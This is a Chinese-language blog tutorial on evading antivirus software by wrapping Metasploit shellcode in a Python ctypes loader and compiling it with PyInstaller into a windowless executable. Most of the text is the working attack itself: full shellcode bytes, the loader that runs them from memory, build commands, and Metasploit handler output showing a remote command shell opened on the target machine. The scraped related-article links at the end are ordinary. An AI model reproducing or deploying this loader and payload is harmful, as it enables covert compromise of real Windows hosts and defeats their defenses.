绕过杀毒软件,有很多钟方法。此处介绍一种,编写python程序调用shellcode,并使用Pyinstaler将python程序编译为exe程序。

准备工作:(Windows XP环境下编译)

将Python程序编译为exe,须要Python主程序,pywin32库,Pyinstaller(直接解压到C盘)。

假设编译过程中出现错误提示,请依照指示解决这个问题。

安装过程不是非常复杂,在此不予说明。

https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi

http://softlayer-dal.dl.sourceforge.net/project/pywin32/pywin32/Build%20219/pywin32-219.win32-py2.7.exe

https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller-2.1.tar.gz

利用metasploit生成shellcode。供后面的python程序使用。

msf payload(shell_bind_tcp) > show options  

 

Module options (payload/windows/shell_bind_tcp):

 

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  seh              yes       Exit technique (accepted: seh, thread, process, none)

   LPORT     4444             yes       The listen port

   RHOST     0.0.0.0          no        The target address

 

msf payload(shell_bind_tcp) > generate -b '\x00' -f /home/nixawk/bind_tcp.txt -p windows -t c

[*] Writing 1803 bytes to /home/nixawk/bind_tcp.txt...

准备完毕后。python程序源代码例如以下:

from ctypes import *



shellcode = '\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x01\x6b\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3'



memorywithshell = create_string_buffer(shellcode, len(shellcode))

shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

shell()

利用Pyinstaller编译上述包括shellcode的python文件,命令例如以下:

C:\PyInstaller-2.1\utils>pythonmakespec.py --onefile --noconsole shellcode.py

wrote C:\PyInstaller-2.1\utils\shellcode.spec

now run pyinstaller.py to build the executable

C:\PyInstaller-2.1\utils>pythonbuild.py shellcode.spec
59 INFO: Testing for ability to set icons, version resources...

69 INFO: ... resource update available

79 INFO: UPX is not available.

109 INFO: Processing hook hook-os

259 INFO: Processing hook hook-time

259 INFO: Processing hook hook-cPickle

349 INFO: Processing hook hook-_sre

509 INFO: Processing hook hook-cStringIO

639 INFO: Processing hook hook-encodings

660 INFO: Processing hook hook-codecs

1171 INFO: Extending PYTHONPATH with C:\PyInstaller-2.1\utils

1171 INFO: checking Analysis

1171 INFO: building Analysis because out00-Analysis.toc non existent

1171 INFO: running Analysis out00-Analysis.toc

1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable

1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...

1171 WARNING: Assembly not found

1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found

1220 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\python.exe

1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...

1230 WARNING: Assembly not found

1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found

1351 WARNING: lib not found: MSVCR90.dll dependency of C:\WINDOWS\system32\python27.dll

1351 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\_pyi_bootstrap.py

1381 INFO: Processing hook hook-os

1401 INFO: Processing hook hook-site

1421 INFO: Processing hook hook-encodings

1562 INFO: Processing hook hook-time

1562 INFO: Processing hook hook-cPickle

1661 INFO: Processing hook hook-_sre

1822 INFO: Processing hook hook-cStringIO

1961 INFO: Processing hook hook-codecs

2463 INFO: Processing hook hook-pydoc

2632 INFO: Processing hook hook-email

2713 INFO: Processing hook hook-httplib

2763 INFO: Processing hook hook-email.message

2844 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_importers.py

2904 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_archive.py

2963 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_carchive.py

3043 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_os_path.py

3043 INFO: Analyzing shellcode.py

3114 INFO: Hidden import 'codecs' has been found otherwise

3114 INFO: Hidden import 'encodings' has been found otherwise

3114 INFO: Looking for run-time hooks

3154 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\select.pyd

3203 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\unicodedata.pyd

3273 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_hashlib.pyd

3323 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\bz2.pyd

3414 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ssl.pyd

3484 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ctypes.pyd

3555 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_socket.pyd

3575 INFO: Using Python library C:\WINDOWS\system32\python27.dll

3625 INFO: Warnings written to C:\PyInstaller-2.1\utils\build\shellcode\warnshellcode.txt

3634 INFO: checking PYZ

3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing

3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc

4815 INFO: checking PKG

4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing

4815 INFO: building PKG (CArchive) out00-PKG.pkg

6167 INFO: checking EXE

6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing

6167 INFO: building EXE from out00-EXE.toc

6167 INFO: Appending archive to EXE C:\PyInstaller-2.1\utils\dist\shellcode.exe

编译完毕后,将shellcode.exe放到目标主机上运行,成功获取反弹shell。
msf exploit(handler) > set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp

msf exploit(handler) > show options  

 

Module options (exploit/multi/handler):

 

   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------

 

 

Payload options (windows/shell/reverse_tcp):

 

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port

 

 

Exploit target:

 

   Id  Name

   --  ----

   0   Wildcard Target

 

 

msf exploit(handler) > set LHOST 192.168.1.107

LHOST => 192.168.1.107

msf exploit(handler) > run

 

[*] Started reverse handler on 192.168.1.107:4444  

[*] Starting the payload handler...

[*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (267 bytes) to 192.168.1.112

[*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800

 

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

 

C:\PyInstaller-2.1\utils> 

參考链接:

http://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing

https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers

http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/

http://schierlm.users.sourceforge.net/avevasion.html

http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/

Metasploit - Tips for Evading Anti-Virus的更多相关文章

  1. BlackArch-Tools

    BlackArch-Tools 简介 安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 ...

  2. Automated Memory Analysis

    catalogue . 静态分析.动态分析.内存镜像分析对比 . Memory Analysis Approach . volatility: An advanced memory forensics ...

  3. jmeter工具下载及工具功能操作介绍

     本博文jmeter介绍的是在windows下使用,linux后期看情况更新,谢谢 简单介绍,想更多了解的去官方,多的很: The Apache JMeter™ application is open ...

  4. QUICK START GUIDE

    QUICK START GUIDE This page is a guide aimed at helping anyone set up a cheap radio scanner based on ...

  5. cygwin 扩展

    1.使用setup,然后一路安装到select package,选择需要的包即可,然后一路next. 2.setup.exe -q -P 包名, 详细用法如下: Command Line Option ...

  6. Mysql Communications link failure 问题的解决

    问题现象 com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure The last p ...

  7. 使用JMeter3.0实战之分布式并发测试以及web API接口测试

    简介: 该文档是以Apche JMeter-3.0为例进行编写的,通过网上的学习资料和官方文档的说明手册学习后,进行项目操作实践,将测试的过程记录下提供给大家学习. 本博文的内容主要是进行配置JMet ...

  8. 各种WAF绕过手法学习

    原文:https://mp.weixin.qq.com/s/aeRi1lRnKcs_N2JLcZZ0Gg 0X00    Fuzz/爆破 fuzz字典 1.Seclists/Fuzzing https ...

  9. metasploit 渗透测试笔记(基础篇)

    0x00 背景 笔记在kali linux(32bit)环境下完成,涵盖了笔者对于metasploit 框架的认识.理解.学习. 这篇为基础篇,并没有太多技巧性的东西,但还是请大家认真看啦. 如果在阅 ...

随机推荐

  1. Linux停止tomcat运行

    打开终端cd /java/tomcat#执行bin/startup.sh #启动tomcatbin/shutdown.sh #停止tomcattail -f logs/catalina.out #看t ...

  2. 6、DRN-----深度强化学习在新闻推荐上的应用

    1.摘要: 提出了一种新的深度强化学习框架的新闻推荐.由于新闻特征和用户喜好的动态特性,在线个性化新闻推荐是一个极具挑战性的问题. 虽然已经提出了一些在线推荐模型来解决新闻推荐的动态特性,但是这些方法 ...

  3. [原创]Linux 下 redis 链接一次

    刚接触 Linux ,在 Linux 下安装 redis 链接redis 出现了以下问题  Could not connect to Redis at 127.0.0.1:6379: Connecti ...

  4. AWS中国EC2 公网IP登录免pemKEY修改shh 配置文件

    个人使用记录 1:KEY 授权 chmod 400 VPN.pem 2:连接 ssh -i "VPN.pem" ubuntu@ec2-54-183-119-93.us-west-1 ...

  5. vsftpd服务程序的三种认证模式

    vsftpd服务程序的三种认证模式的配置方法——匿名开放模式.本地用户模式以及虚拟用户模式.了解PAM可插拔认证模块的原理.作用以及实战配置方法,通过实战课程进一步继续学习SELinux服务的配置方法 ...

  6. 《Craking the Coding interview》python实现---02

    ###题目:翻转一个字符串###思路:从字符串的最后一位开始,依次取###实现:伪代码.函数.类实现#伪代码: #01string=sNew_s=""for i in range( ...

  7. 不要在.h文件中定义变量

    今天在头文件.h中初始化了一个数组和函数,在编译的时候提示这个数组和函数重新定义了,检查后发现,犯了一个致命的错误,在头文件中定义变量... 以下引用别人的一篇说明,警示自己. C语言作为一种结构化的 ...

  8. Java基础学习总结(3)——抽象类

    一.抽象类介绍 下面通过一下的小程序深入理解抽象类 因此在类Animal里面只需要定义这个enjoy()方法就可以了,使用abstract关键字把enjoy()方法定义成一个抽象方法,定义如下:pub ...

  9. Eclipse中JSON文件报错,如何解决?

    eclipse里面的JSON文件老报错,虽然可以正常运行,但红X看起来就是不爽,怎么解决呢? 这是因为Eclipse认为JSON文件不需要注释,所以报的编译错误,我们可以通过Eclipse的设置把它的 ...

  10. 在VS2013中配置QT5 win7_64

    转自 在VS2013中配置QT5 win7_64 环境: win x64 + vs2013+QT5+vs_addin 下面示例正确配置QT以及VS2013 + QT Addin开发环境: 下载VS20 ...